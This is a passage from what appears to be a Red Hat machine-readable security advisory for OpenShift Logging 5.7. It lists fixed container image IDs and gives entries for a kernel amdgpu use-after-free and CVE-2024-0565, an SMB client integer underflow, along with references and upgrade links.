"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c"
},
{
"cve": "CVE-2024-0565",
"cwe": {
"id": "CWE-191",
"name": "Integer Underflow (Wrap or Wraparound)"
},
"discovery_date": "2024-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2258518"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability considered being Moderate impact because of limitations for attack scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-0565"
},
{
"category": "external",
"summary": "RHBZ#2258518",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-0565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0565"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-0565",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0565"
},
{
"category": "external",
"summary": "https://www.spinics.net/lists/stable-commits/msg328851.html",
"url": "https://www.spinics.net/lists/stable-commits/msg328851.html"
}
],
"release_date": "2023-12-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
